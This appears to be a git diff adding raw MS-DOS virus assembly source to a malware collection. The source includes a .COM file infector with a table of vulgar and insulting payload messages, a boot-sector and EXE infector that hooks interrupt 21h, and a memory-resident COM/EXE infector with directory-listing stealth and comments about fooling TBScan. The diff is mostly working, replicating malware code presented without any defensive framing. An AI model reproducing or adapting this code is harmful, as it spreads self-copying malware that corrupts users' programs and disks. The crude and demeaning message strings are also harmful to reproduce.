+ Int 21h ; Zoeken naar volgende .COM file
+ Jnc KijkInfected ; Geen gevonden, goto Afgelopen
+ Jmp Afgelopen ;------------------
+Infect:
+ Mov DX,Proggie ; beveiliging weghalen
+ Mov AH,43h ;
+ Mov AL,1 ;
+ Xor CX,Cx
+ Int 21h ;------------------
+ Mov AH,3Dh ; Bestand openen
+ Mov AL,2 ;
+ Mov DX,Proggie ;
+ Int 21h ;------------------
+ Mov FH,AX ; Opslaan op stack van
+ Mov BX,AX ; datum voor later gebruik
+ Mov AH,57H ;
+ Mov AL,0 ;
+ Int 21h ;
+ Push CX ;
+ Push DX ;------------------
+ Mov AH,3Fh ; Inlezen van eerste deel van het
+ Mov CX,VirLen+2 ; programma om later terug te
+ Mov DX,Buff1 ; kunnen plaatsen.
+ Int 21h ;------------------
+ Mov AH,42H ; File Pointer weer naar het
+ Mov AL,2 ; einde van het programma
+ Xor CX,CX ; zetten
+ Xor DX,DX ;
+ Int 21h ;------------------
+ Xor DX,DX ; Bepalen van de variabele sprongen
+ Add AX,100h ; in het virus (move-routine)
+ Mov Sprong,AX ;
+ Add AX,MovLen ;
+ Mov Source,AX ;------------------
+ Mov AH,40H ; Move routine bewaren aan
+ Mov DX,Offset Mover ; einde van file
+ Mov CX,MovLen ;
+ Int 21h ;------------------
+ Mov AH,40H ; Eerste deel programma aan-
+ Mov DX,Buff1 ; voegen na Move routine
+ Mov CX,VirLen ;
+ Int 21h ;------------------
+ Mov AH,42h ; File Pointer weer naar
+ Mov AL,0 ; het begin van file
+ Xor CX,CX ; sturen
+ Xor DX,DX ;
+ Int 21h ;------------------
+ Mov AH,40h ; En programma overschrijven
+ Mov DX,Offset Begin ; met code van het virus
+ Mov CX,VirLen ;
+ Int 21h ;------------------
+ Mov AH,57h ; Datum van aangesproken file
+ Mov AL,1 ; weer herstellen
+ Pop DX ;
+ Pop CX ;
+ Int 21h ;------------------
+ Mov AH,3Eh ; Sluiten file
+ Int 21h ;------------------
+Afgelopen: Mov BX,Buf2 ; Sprongvariabelen weer
+ Mov Source,BX ; op normaal zetten voor
+ Mov AX,Buf1 ; de Move routine
+ Mov Sprong,AX ;------------------
+ Mov AH,1Ah ; DTA adres weer op normaal
+ Mov Dx,80h ; zetten en naar de Move
+ Int 21h ; routine springen
+ Mov Ah,2Ch
+ Int 21h
+ Xor DL,DL
+ Xchg Dh,Dl
+ Add Dx,Dx
+; And Dx,11111110b
+ Add Dx,Offset MsgTab
+ Mov Si,Dx
+ Mov Dx,Cs:[SI]
+ Mov AH,9
+ Int 21h
+ Jmp CS:[Sprong] ;------------------
+
+Msgtab DW offset Msg1
+ DW offset Msg2
+ DW offset Msg3
+ DW offset Msg4
+ DW offset Msg5
+ DW offset Msg6
+ DW offset Msg7
+ DW offset Msg8
+ DW offset Msg9
+ DW offset Msg10
+ DW offset Msg11
+ DW offset Msg12
+ DW offset Msg13
+ DW offset Msg14
+ DW offset Msg15
+ DW offset Msg16
+ DW offset Msg17
+ DW offset Msg18
+ DW offset Msg19
+ DW offset Msg20
+ DW offset Msg21
+ DW offset Msg22
+ DW offset Msg23
+ DW offset Msg24
+ DW offset Msg25
+ DW offset Msg26
+ DW offset Msg27
+ DW
offset Msg28
+ DW offset Msg29
+ DW offset Msg30
+ DW offset Msg31
+ DW offset Msg32
+ DW offset Msg33
+ DW offset Msg34
+ DW offset Msg35
+ DW offset Msg36
+ DW offset Msg37
+ DW offset Msg38
+ DW offset Msg39
+ DW offset Msg40
+ DW offset Msg41
+ DW offset Msg42
+ DW offset Msg43
+ DW offset Msg44
+ DW offset Msg45
+ DW offset Msg46
+ DW offset Msg47
+ DW offset Msg48
+ DW offset Msg49
+ DW offset Msg50
+ DW offset Msg51
+ DW offset Msg52
+ DW offset Msg53
+ DW offset Msg54
+ DW offset Msg55
+ DW offset Msg56
+ DW offset Msg57
+ DW offset Msg58
+ DW offset Msg59
+ DW offset Msg60
+
+Msg1 Db 13,10,'Cycle sluts from hell',13,10,'$'
+Msg2 Db 13,10,'Virus Mania IV',13,10,'$'
+Msg3 Db 13,10,'2 Live Crew is fucking cool',13,10,'$'
+Msg4 Db 13,10,'Like Commentator I, HIP-HOP sucks',13,10,'$'
+Msg5 Db 13,10,'Dr. Ruth is a first-class lady!',13,10,'$'
+Msg6 Db 13,10,'Dont be a wimp, be dead!',13,10,'$'
+Msg7 Db 13,10,'This dick was made for laying girls.',13,10,'$'
+Msg8 Db 13,10,'No virus entry, just me!',13,10,'$'
+Msg9 Db 13,10,'Dont bite it, you horny bitch!',13,10,'$'
+Msg10 Db 13,10,'Stroke my keys, oh YES!',13,10,'$'
+Msg11 Db 13,10,'Sex Revolution 4000',13,10,'$'
+Msg12 Db 13,10,'Buck Rogers is fake',13,10,'$'
+Msg13 Db 13,10,'(C) by Glenn Benton',13,10,'$'
+Msg14 Db 13,10,'Registration number required',13,10,'$'
+Msg15 Db 13,10,'The fly is alive',13,10,'$'
+Msg16 Db 13,10,'Dont fuck with me, or I will kick some ass...',13,10,'$'
+Msg17 Db 13,10,'Hey, dont hit the keys that hard!',13,10,'$'
+Msg18 Db 13,10,'You will feel me...',13,10,'$'
+Msg19 Db 13,10,'BEER BEER BEER BEER BEER BEER BEER!!!',13,10,'$'
+Msg20 Db 13,10,'YOU HAVE A VIRUS, BWAH AH AH EH EH HEH ARF!',13,10,'$'
+Msg21 Db 13,10,'I would alter Michael Jacksons face with my fists...',13,10,'$'
+Msg22 Db 13,10,'WIM KOK IS STILL A COMMUNIST!',13,10,'$'
+Msg23 Db 13,10,'Welcome to COMMENTATOR II',13,10,'$'
+Msg24 Db 13,10,'Commentator I & II released!',13,10,'$'
+Msg25 Db 13,10,'Legalize ABORTUS!',13,10,'$'
+Msg26 Db 13,10,'Ronald McDonald goes Oude-Pekela!',13,10,'$'
+Msg27 Db 13,10,'Source code soon aveable...',13,10,'$'
+Msg28 Db 13,10,'Dont use a rubber against this virus!',13,10,'$'
+Msg29 Db 13,10,'Swimming holiday in Bangladesh!',13,10,'$'
+Msg30 Db 13,10,'Neo Nazis are a pile of shit.',13,10,'$'
+
+Msg31 Db 13,10,'Virus researchers are a pile of meat on the street.',13,10,'$'
+Msg32 Db 13,10,'World Championship Cat-Throwing',13,10,'$'
+Msg33 Db 13,10,'Yo Yo Yo Yo Yo Yo Yo, James Brown is DEAD!',13,10,'$'
+Msg34 Db 13,10,'Yech, you are reminding me of my mother-in-law...',13,10,'$'
+Msg35 Db 13,10,'How is the weather out there?',13,10,'$'
+Msg36 Db 13,10,'Indalis is a fat bitch who looks like a glass-bin.',13,10,'$'
+Msg37 Db 13,10,'Lubbers should be castrated for a long time ago.',13,10,'$'
+Msg38 Db 13,10,'Legalize hookers (at a low prize!)',13,10,'$'
+Msg39 Db 13,10,'Fist fucking sounds irrelevant to you, eh?',13,10,'$'
+Msg40 Db 13,10,'I will be Back...',13,10,'$'
+Msg41 Db 13,10,'Today it is..... JUDGEMENT DAY!!!',13,10,'$'
+Msg42 Db 13,10,'Never mind the dog, beware of owner.',13,10,'$'
+Msg43 Db 13,10,'You still owe me a CO-PROCESSOR!',13,10,'$'
+Msg44 Db 13,10,'Do not drink and drive',13,10,'$'
+Msg45 Db 13,10,'Last name ALMIGHTY, first name DICK',13,10,'$'
+Msg46 Db 13,10,'Frodo lives!',13,10,'$'
+Msg47 Db 13,10,'The leech lives',13,10,'$'
+Msg48 Db 13,10,'Hey, Cracker Jack! Nice virus you made!',13,10,'$'
+Msg49 Db 13,10,'A depressive Prince Claus looks like fun!',13,10,'$'
+Msg50 Db 13,10,'Happy Eastern',13,10,'$'
+Msg51 Db 13,10,'Thank god for AIDS',13,10,'$'
+Msg52 Db 13,10,'Art is incredible stupid',13,10,'$'
+Msg53 Db 13,10,'Out of semen error',13,10,'$'
+Msg54 Db 13,10,'Incorrect BEF version',13,10,'$'
+Msg55 Db 13,10,'Of je stopt de stekker erin?!?',13,10,'$'
+Msg56 Db 13,10,'Jean Claude van Damme kicks ass.',13,10,'$'
+Msg57 Db 13,10,'Cannabis expands the mind',13,10,'$'
+Msg58 Db 13,10,'What is this memory?
EMS XMS LIM HMA UMB?',13,10,'$'
+Msg59 Db 13,10,'NOOOOOO NOT AN IBM SYSTEM, PLEASE!!!!!',13,10,'$'
+Msg60 Db 13,10,'Dutch Virus Research Laboratory',13,10,'$'
+
+;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
+; All variables are stored in here, like filehandle, date/time,
+; search path and various buffers.
+;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
+
+FH DW 0
+FindPath DB '*.COM',0
+
+Buf1 DW 0
+Buf2 DW 0
+
+Sprong DW 0
+Source DW 0
+
+;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
+; This will contain the relocator routine, located at the end of
+; the ORIGINAL file. This will tranfer the 1st part of the program
+; to it's original place.
+;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
+Mover:
+ Mov DI,Offset Begin ;------------------
+ Mov SI,Source ; Verplaatsen van het 1e deel
+ Mov CX,VirLen-1 ; van het programma, wat achter
+ Rep Movsb ;------------------
+ Pop DI ; Opgeslagen registers weer
+ Pop SI ; terugzetten op originele
+ Pop SS ; waarde en springen naar
+ Pop ES ; het begin van het programma
+ Pop DS ; (waar nu het virus niet meer
+ Pop DX ; staat)
+ Pop CX ;
+ Pop BX ;
+ Pop AX ;
+ Popf ;
+ Mov BX,100h ;
+ Jmp BX ;------------------
+
+;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
+; Only the end of the virus is stored in here.
+;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
+Einde db 0
+
+Code Ends
+End Begin
+
+; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
+; 哪哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪
+; 哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪
+; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
diff --git a/MSDOS/Virus.MSDOS.Unknown.compiler.asm b/MSDOS/Virus.MSDOS.Unknown.compiler.asm
new file mode 100644
index 00000000..e88044ed
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.compiler.asm
@@ -0,0 +1,312 @@
+
+ cut equ offset len-300h
+ virsize equ offset len-100h
+ memsize equ (virsize+20h)/16+1
+
+ xor di,di
+ mov ds,di
+ mov ss,di
+ mov sp,7BF0h
+ mov si,7C00h
+ push si
+ mov ax,3000h
+ mov es,ax
+ mov cx,201h
+ push cx
+ push cx
+ rep movsw
+ pop ax
+ push cx
+ mov cl,8
+ mov bx,cut
+ mov dx,80h
+ int 13h
+ mov [1Ch*4],offset timer-100h
+ mov [1Ch*4+2],3000h
+ pop es
+ inc cx
+ pop ax
+ pop bx
+ db 0EAh
+ dw offset jump-100h
+ dw 3000h
+
+ jump db 0CDh,013h,0EAh,00,07Ch,00,00
+
+ timer: push ax
+ push ds
+ xor ax,ax
+ mov ds,ax
+ cmp [84h],ax
+ jz tmexit
+ mov ax,[10h] ; int 04h
+ mov [70h],ax ; int 1Ch
+ mov ax,[12h]
+ mov [72h],ax
+ mov ax,[84h]
+ mov cs:old-100h,ax
+ mov ax,[86h]
+ mov cs:old+2-100h,ax
+ mov [84h],offset int21-100h
+ mov [86h],cs
+ mov ax,[2Fh*4]
+ mov cs:int2F-100h,ax
+ mov ax,[2Fh*4+2]
+ mov cs:int2F+2-100h,ax
+ tmexit: pop ds
+ pop ax
+ iret
+
+ int21: cmp ax,4B00h
+ jne exit21
+ push ax
+ push bx
+ push cx
+ push dx
+ push ds
+ push es
+ push si
+ push di
+ mov ah,52h
+ int 21h
+ xor si,si
+ xor di,di
+ mov ds,es:[bx-2]
+ mov bx,ds
+ mov ax,[di+3]
+ add [di+3],memsize
+ inc bx
+ add ax,bx
+ mov es,ax
+ push ax
+ mov ax,es:[di+3]
+ sub ax,memsize
+ push ax
+ mov ax,[di+3]
+ add ax,bx
+ mov ds,ax
+ mov byte ptr [di],5Ah
+ mov word ptr [di+1],di
+ pop [di+3]
+ pop es
+ push cs
+ pop ds
+ mov cx,virsize/2+1
+ rep movsw
+ mov ds,cx
+ mov [84h],offset res21-100h
+ mov [86h],es
+ back: pop di
+ pop si
+ pop es
+ pop ds
+ pop dx
+ pop cx
+ pop bx
+ pop ax
+ exit21: db 0EAh
+ old dw ?
+ dw ?
+
+ res21: push ax
+ push bx
+ push cx
+ push dx
+ push ds
+ push es
+ push si
+ push di
+ cmp ah,3Eh
+ je close
+ cmp ah,3Dh
+ jne back
+
+ open: call driver
+ xchg ax,bx
+ jc out
+ call chexe
+ jne out
+ mov cs:len-100h,cx
+ out: mov ah,3Eh
+ call driver
+ jmp back
+
+ close: call chexe
+ jne back
+ cmp cx,cs:len-100h
+ je back
+ cmp cx,5000
+ jb back
+ push cx
+ push dx
+ push cs
+ pop es
+ push cs
+ pop ds
+ mov ah,3Fh
+ mov dx,offset buf-100h
+ mov cx,20h
+ call driver
+ mov si,offset buf+0Eh-100h
+ mov di,offset save-100h
+ movsw
+ movsw
+ lodsw
+ movsw
+ movsw
+ pop dx
+ pop ax
+ mov cl,16
+ div cx
+ inc ax
+ push ax
+ push ax
+ mul cx
+ mov cx,ax
+ xchg cx,dx
+ mov ax,4200h
+ call driver
+ pop ax
+ sub ax,[si-10h]
+ mov [si-2],ax
+ mov [si-0Ah],ax
+ mov [si-8],500h
+ mov [si-4],offset go-100h
+ pop ax
+ xor dx,dx
+ mov cx,20h
+ push cx
+ div cx
+ inc ax
+ inc ax
+ mov [si-14h],ax
+ mov [si-16h],dx
+ mov ah,40h
+ mov cx,virsize
+ xor dx,dx
+ call driver
+ call chexe
+ mov ah,40h
+ pop cx
+ mov dx,offset buf-100h
+ call driver
+ jmp back
+
+ go: mov bx,es
+ add bx,10h
+ add cs:save+6-100h,bx
+ add bx,cs:save-100h
+ push bx
+ push ds
+ push es
+
+ call cell
+ test si,si
+ je exec
+ cmp word ptr [si+2],0A000h
+ jb exec
+ mov ah,2
+ push cs
+ pop es
+ push cs
+ pop ds
+ mov bx,offset buf-100h
+ mov cl,1
+ call doit
+ xor si,si
+ mov di,bx
+ mov cl,cut/2
+ rep cmpsw
+ je exec
+ inc count-100h
+ mov ah,3
+ mov cl,9
+ call doit
+ xor si,si
+ mov di,bx
+ mov cl,cut/2+1
+ rep movsw
+ mov ah,3
+ inc cx
+ call doit
+ mov bx,cut
+ mov cl,8
+ mov ah,3
+ call doit
+
+ exec: pop es
+ pop ds
+ pop ss
+ mov sp,cs:save+2-100h
+ jmp dword ptr cs:save+4-100h
+
+ chexe: push bx
+ mov ax,1220h
+ call dosint
+ mov bl,es:[di]
+ mov ax,1216h
+ call dosint
+ pop bx
+ add di,15h
+ xor ax,ax
+ stosw
+ stosw
+ mov cx,es:[di-8]
+ mov dx,es:[di-6]
+ add di,0Fh
+ mov ax,'XE'
+ scasw
+ jne notexe
+ scasb
+ clc
+ notexe: ret
+
+ cell: push ax
+ push bx
+ push cx
+ mov ah,30h
+ int 21h
+ xor
si,si
+ xchg ah,al
+ cmp ax,401h
+ ja newdos
+ cmp ax,314h
+ jb newdos
+ cmp ax,31Eh
+ mov si,7B4h
+ jae newdos
+ mov si,10A5h
+ cmp al,10
+ je newdos
+ mov si,1EC9h
+ newdos: mov ds,cx
+ pop cx
+ pop bx
+ pop ax
+ ret
+
+ driver: pushf
+ call dword ptr cs:old-100h
+ ret
+
+ doit: push ds
+ call cell
+ mov ch,0
+ mov al,1
+ mov dx,80h
+ pushf
+ call dword ptr [si]
+ pop ds
+ ret
+
+ dosint: pushf
+ db 9Ah
+ int2F dw ?
+ dw ?
+ ret
+
+ count dw 0
+ save dw 4 dup (?)
+ len label word
+ buf label word
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.compo.asm b/MSDOS/Virus.MSDOS.Unknown.compo.asm
new file mode 100644
index 00000000..d0ec5518
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.compo.asm
@@ -0,0 +1,616 @@
+;% You-name-the-bitch %
+;哪哪哪哪哪哪哪哪哪哪哪
+.model tiny
+.code
+ org 100h
+
+pagesize equ (((offset last) - (offset start)) shr 9) + 1
+parasize equ (((offset last) - (offset start)) shr 4) + 1
+bytesize equ (parasize shl 4)
+lastpage equ bytesize - (pagesize shl 9)
+
+
+start:
+ push ds
+ call install
+entry:
+ jmp restore
+
+; Information about host program
+
+orgip dw 020CDh ; Entry point if .exe,
+orgcs dw 0 ; if .com first 3 bytes of file.
+com db 0FFh ; If .exe com=0 if .com com=FF
+
+install:
+ ; Check if already resident
+ mov ah, 30h ; Get dos version
+ mov bx, 1009 ; Installation check
+ int 21h
+ cmp bx, 9001 ; Is installed?
+ jne gores
+ mov bp, sp ; Get delta offset
+ mov bp, ss:[bp]
+ ret
+
+org21:
+ db 0EAh ; Buffer for original int21
+org21o dw ?
+org21s dw ?
+
+gores:
+ pop bp
+ cmp al, 03h ; Check dos version
+ jb restore
+
+ ; Try to allocate memory
+memall: mov ah, 48h ; Allocate memory
+ mov bx, parasize+3
+ int 21h
+ jnc gohigh
+
+ ; Try to decrease host memory
+ push es ; Get MCB
+ mov bx, es
+ dec bx
+ mov es, bx
+ mov bx, es:[03h] ; Get size of memory
+ sub bx, parasize+4 ; Calculate needed memory
+ pop es
+ mov ah, 4Ah ; Decrease memory block
+ int 21h
+ jnc memall ; Allocate memory for virus
+ jmp restore
+
+gohigh:
+ ; Move virus to new memory
+ dec ax ; es to new mcb
+ mov es, ax
+ mov word ptr es:[1], 8 ; mark dos as owner
+ mov di, 10h ; Set es:di to new block
+ push cs ; Set ds:si to virus code
+ pop ds
+ mov si, bp
+ sub si, 4 ; Adjust for first call
+ mov cx, bytesize
+ cld
+ rep movsb
+
+ ; Install in int21 vector
+ sub ax, 0Fh ; Adjust for org 100h
+ mov ds, ax
+ mov ax, 3521h ; Save int21 vector
+ int 21h
+ mov org21o, bx
+ mov org21s, es
+ mov ah, 25h ; Set int21 vector
+ mov dx, offset vector21
+ int 21h
+
+
+restore:
+ ; Restore original program
+ pop es
+ push es
+ cmp byte ptr cs:bp[6], 00h ; Check file type
+ je restexe
+
+ ; Restore .com program
+ push es
+ pop ds
+ mov di, 100h
+ push di
+ mov ax, cs:bp[2]
+ stosw
+ mov al, cs:bp[4]
+ stosb
+ retf
+
+restexe:
+ ; Restore .exe program
+ pop ax
+ mov ds, ax
+ add ax, cs:bp[4] ; relocate cs
+ add ax, 10h
+ push ax
+ mov ax, cs:bp[2] ; get ip
+ push ax
+ retf ; Jump to host
+
+
+
+vector21:
+ cmp ah, 30h ; Get dos version?
+ jne chkexe
+ cmp bx, 1009 ; Installation check?
+ jne chkexe
+ call dos
+ mov bx, 9001 ; Return residency code
+ retf 2
+chkexe:
+ cmp ax, 4B00h ; Load and execute?
+ jne chkfcb
+ call infect ; Infect file
+ jmp chnexit
+chkfcb:
+ cmp ah, 11h ; Find file?
+ je fcb
+ cmp ah, 12h ; Find file?
+ je fcb
+
+ cmp ah, 4Eh ; Find handle?
+ je fhdl
+ cmp ah, 4Fh ; Find handle?
+ jne chnexit
+fhdl: call dos
+ jnc fhdls
+ retf 2
+fhdls: jmp findhandle
+
+chnexit:
+ jmp org21
+
+
+fcb:
+; Called on find first/find next fcb
+ ; Perform dos call
+
+ call dos
+ or al, al ; Check if a file was found
+ jz exist
+ retf 2
+exist:
+ push ax
+ push bx
+ push cx
+ push dx
+ push si
+ push di
+ push ds
+ push es
+
+ mov ax, 6200h ; Get psp
+ call dos
+ mov es, bx
+ cmp bx, es:[16h] ; Ensure that dos is calling
+ jne fcbexit
+
+ call getdta ; Get address of fcb
+ lodsb ; Check if extended
+ cmp al, 0FFh
+ jne noext
+ add si, 7
+noext:
+ mov bx, si
+ add si, 8 ; Check extension
+ lodsw
+ push ax
+
+ add si, 0Ch ; Check for infection
+ lodsb
+ and al, 1Fh
+ cmp al, 03h
+ pop ax
+ pushf
+ add si, 5
+
+ cmp ax, 'OC'
+ je fcbcom
+ cmp ax, 'XE'
+ je fcbexe
+ popf
+ jmp fcbexit
+
+fcbcom:
+ ; Check for infection
+ popf
+ jne fcbcomni
+ sub word ptr [si], bytesize
+ jmp fcbexit
+fcbcomni:
+ in al, 41h ; Get timer (rnd)
+ test al, 03h ; 25% infection
+ jne fcbexit
+ call cvtasciz ; Convert to asciz
+ mov ax, 'C.' ; Append exetnsion
+ stosw
+ mov ax, 'MO'
+ stosw
+ jmp fcbinfect
+
+fcbexe:
+ ; Check for infection
+ popf
+ jne fcbexeni
+ sub word ptr [si], bytesize
+ jmp fcbexit
+fcbexeni:
+ in al, 41h ; Get timer (rnd)
+ test al, 03h ; 25% infection
+ jne fcbexit
+ call cvtasciz
+ mov ax, 'E.'
+ stosw
+ mov ax, 'EX'
+ stosw
+
+fcbinfect:
+ xor al, al
+ stosb
+ mov dx, offset last
+ push cs
+ pop ds
+ call infect
+
+fcbexit:
+ pop es
+ pop ds
+ pop di
+ pop si
+ pop dx
+ pop cx
+ pop bx
+ pop ax
+ retf 2
+
+
+cvtasciz proc
+ push cs ; Convert to asciz
+ pop es
+ mov si, bx
+ mov di, offset last
+ mov cx, 8
+loop3: lodsb
+ cmp al, ' '
+ je loopx
+ stosb
+ loop loop3
+loopx: ret
+cvtasciz endp
+
+
+infect proc
+; Called on load and execute
+ push ax
+ push bx
+ push cx
+ push dx
+ push si
+ push di
+ push ds
+ push es
+
+ mov ax, 3D82h ; Open victim
+ call dos
+ jc exitinfect
+ xchg ax, bx
+
+ mov ax, 5700h ; Save file date/time
+ call dos
+ push dx
+ push cx
+
+ mov ah, 3Fh ; Read first bytes
+ push cs
+ pop ds
+ lea dx, orgip
+ mov cx, 2
+ call dos
+ xor orgip, 4523h ; Check if .exe file
+ cmp orgip, 'MZ' xor 4523h ; TBScan fooled again...
+ je infectexe
+ cmp orgip, 'ZM' xor 4523h
+ je infectexe
+ xor orgip, 4523h
+ jmp infectcom
+
+infectdone:
+ pop cx ; Restore date/time of file
+ pop dx
+ mov ax, 5701h
+ call dos
+
+ mov ah, 3Eh ; Close file
+ call dos
+exitinfect:
+ pop es
+ pop ds
+ pop di
+ pop si
+ pop dx
+ pop cx
+ pop bx
+ pop ax
+ ret
+infect endp
+
+infectexe:
+ ; Read header from .exe file
+ mov ah, 3Fh
+ lea dx, last ; Use memory above virus
+ mov cx, 16h
+ call dos
+
+ ; Calculate address of entrypoint
+ mov ax, word ptr last[entryseg] ; Get entry cs value
+ add ax, word ptr last[headsize] ; Get header size
+ mov cx, 10h ; Convert to bytes
+ mul cx
+ add ax, word ptr last[entryofs] ; add ip offset
+ adc dx, 00
+
+ ; Seek to entrypoint
+ mov cx, dx
+ xchg dx, ax
+ mov ax, 4200h
+ call dos
+
+ ; Check if already infected
+ mov ah, 3Fh ; Read bytes at entry
+ mov cx, 4h
+ lea dx, orgip
+ mov si, dx
+ call dos
+
+ lodsw ; Compare entry to virus
+ cmp ax, word ptr start
+ jne exenotinf
+ lodsw
+ cmp ax, word ptr start[2]
+ je infectdone
+
+
+exenotinf:
+ ; Mark infection
+ pop ax ; Get time stamp
+ and al, 0E0h ; Mask seconds
+ or al, 003h ; Set
seconds to 6
+ push ax
+
+ ; Infect file
+ lea si, last[entryofs] ; Save program information
+ lodsw
+ mov orgip, ax
+ lodsw
+ mov orgcs, ax
+ mov cs:com, 0 ; This is .exe
+
+ ; Calculate virus entry
+ mov ax, 4202h ; Seek to eof
+ xor cx, cx
+ cwd
+ call dos
+
+ xchg ax, dx ; eof pos in ax:dx
+ mov cl, 12
+ shl ax, cl
+ mov word ptr last[entryseg], ax
+ xchg ax, dx
+ xor dx, dx
+ mov cx, 10h ; Convert eof pos to paras
+ div cx
+ sub ax, word ptr last[headsize] ; Calculate entry for virus
+ add word ptr last[entryseg], ax ; Save in header
+ mov word ptr last[entryofs], dx
+
+ ; Recalculate size
+ mov ax, word ptr last[lastsize]
+ add ax, bytesize
+ cwd
+ mov cx, 200h
+ div cx
+ mov word ptr last[lastsize], dx
+ add word ptr last[pages], ax
+
+
+ mov ah, 3Fh ; Append virus
+ mov dx, 100h
+ mov cx, bytesize
+ inc ah ; TB-Moron(tm)
+ push ax
+ call dos
+
+ ; Save modified exe-header
+ mov ax, 4200h ; Seek to header
+ xor cx, cx
+ mov dx, 2
+ call dos
+
+ pop ax
+ lea dx, last ; Write header
+ mov cx, 16h
+ call dos
+
+ jmp infectdone
+
+
+infectcom:
+ ; Installation check
+ call ichkcom
+ jnc comnotinf
+ jmp infectdone
+
+comnotinf:
+
+ ; Mark infection
+ pop ax ; Get time stamp
+ and al, 0E0h ; Mask seconds
+ or al, 003h ; Set seconds to 6
+ push ax
+
+ mov com, 0FFh
+
+ ; Seek to eof
+ mov ax, 4202h
+ xor cx, cx
+ cwd
+ call dos
+
+ ; Create jump opcode
+ sub ax, 3
+ mov word ptr last, ax
+
+ ; Append virus
+ mov ah, 3Fh
+ mov cx, bytesize
+ mov dx, 100h
+ inc ah ; TB...
+ push ax
+ call dos
+
+ ; Write jump to beginning of file
+ mov ax, 4200h
+ xor cx, cx
+ cwd
+ call dos
+ pop ax ; TB...
+ mov cx, 3
+ lea dx, jumpop
+ call dos
+
+ jmp infectdone
+
+
+
+findhandle:
+ pushf
+ push ax
+ push bx
+ push cx
+ push si
+ push di
+ push ds
+ push es
+
+ call getdta ; dta to es:si and ds:si
+ mov di, si
+
+ mov al, si[16h] ; Get seconds
+ and al, 1Fh
+ cmp al, 3
+ pushf
+
+ add di, 1Eh ; di to name
+ mov cx, 9
+ mov al, '.'
+ repne scasb ; scan for extension
+ xchg si, di
+ lodsw
+ cmp ax, 'OC' ; check if com?
+ je hdlcom
+ cmp ax, 'XE'
+ je hdlexe
+ popf
+ jmp hdlexit
+
+hdlcom:
+hdlexe:
+ popf
+ jne hdlexit
+ sub word ptr di[1Ah], bytesize
+ sbb word ptr di[1Ch], 0
+
+hdlexit:
+ pop es
+ pop ds
+ pop di
+ pop si
+ pop cx
+ pop bx
+ pop ax
+ popf
+ retf 2
+
+
+
+
+
+
+ichkcom proc
+; Checks if com-file with handle in bx is infected
+
+ mov ax, 4200h ; Seek to beginning
+ xor cx, cx
+ cwd
+ call dos
+
+ push ds
+
+ mov ah, 3Fh ; Read first bytes
+ mov cl, 3
+ mov dx, offset orgip
+ call dos
+
+ cmp byte ptr orgip, 0E9h ; Check if jump
+ jne icnotinf
+
+ mov ax, 4201h ; Seek to entry point
+ xor cx, cx
+ mov dx, word ptr orgip[1]
+ call dos
+
+ mov cl, 4
+ call readtolast ; Get entry point
+ cmp word ptr last, 0E81Eh
+ jne icnotinf
+ cmp word ptr last[2], 00007h
+ jne icnotinf
+
+ pop ds
+ stc ; Return with carry
+ ret
+icnotinf:
+ pop ds
+ clc ; Not infected
+ ret
+ichkcom endp
+
+
+
+dos proc
+ pushf
+ call dword ptr cs:org21o
+ ret
+dos endp
+
+
+getdta proc
+ mov ah, 2Fh ; Get dta
+ call dos
+ push es ; ds:si to dta
+ pop ds
+ mov si, bx
+ ret
+getdta endp
+
+
+readtolast proc
+ mov ah, 3Fh
+ push cs
+ pop ds
+ mov dx, offset last
+ call dos
+ ret
+readtolast endp
+
+
+
+jumpop db 0E9h
+last:
+
+exehead struc
+ lastsize dw ?
+ pages dw ?
+ tblesize dw ?
+ headsize dw ?
+ minalloc dw ?
+ maxalloc dw ?
+ stackseg dw ?
+ stackofs dw ?
+ checksum dw ?
+ entryofs dw ?
+ entryseg dw ?
+exehead ends
+
+end start
+================================================================================
diff --git a/MSDOS/Virus.MSDOS.Unknown.compres.asm b/MSDOS/Virus.MSDOS.Unknown.compres.asm
new file mode 100644
index 00000000..e622cf44
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.compres.asm
@@ -0,0 +1,224 @@
+code segment
+ assume cs:code, ds:code, es:code
+ org 100h
+prog:
+ jmp main
+
+tbl dw 256 dup (0)
+asc db 256 dup (0)
+cod db 256 dup (0)
+len db 256 dup (0)
+dat db 0,10,16,9,64,8,64,8,0,7
+fn1 db 'afd.com',0
+fn2 db 'sup.com',0
+fn3 db 'e1.com',0
+
+main:
+
+ call read
+ call build
+ call uha
+ call good
+ call write
+
+ mov al,00h
+ mov ah,4ch
+ int 21h
+
+good proc near
+ mov ax,cs
+ mov ds,ax
+ mov si,offset asc
+ mov di,152
+ mov cx,256
+ rep movsb
+
+ mov dx,offset fn3
+ mov al,00h
+ mov ah,3dh
+ int 21h
+ jc ssr
+ mov bx,ax
+ mov ax,es
+ mov ds,ax
+ sub dx,dx
+ mov cx,152
+ mov ah,3fh
+ int 21h
+ jc ssr
+ mov ah,3eh
+ int 21h
+ mov ax,cs
+ mov ds,ax
+ssr: ret
+good endp
+
+uha proc near
+ mov ax,cs
+ add ax,1000h
+ mov ds,ax
+ add ax,1000h
+ mov es,ax
+ mov bx,4fffh
+ mov di,bx
+ mov ch,0
+ sub bp,bp
+lu10: sub ax,ax
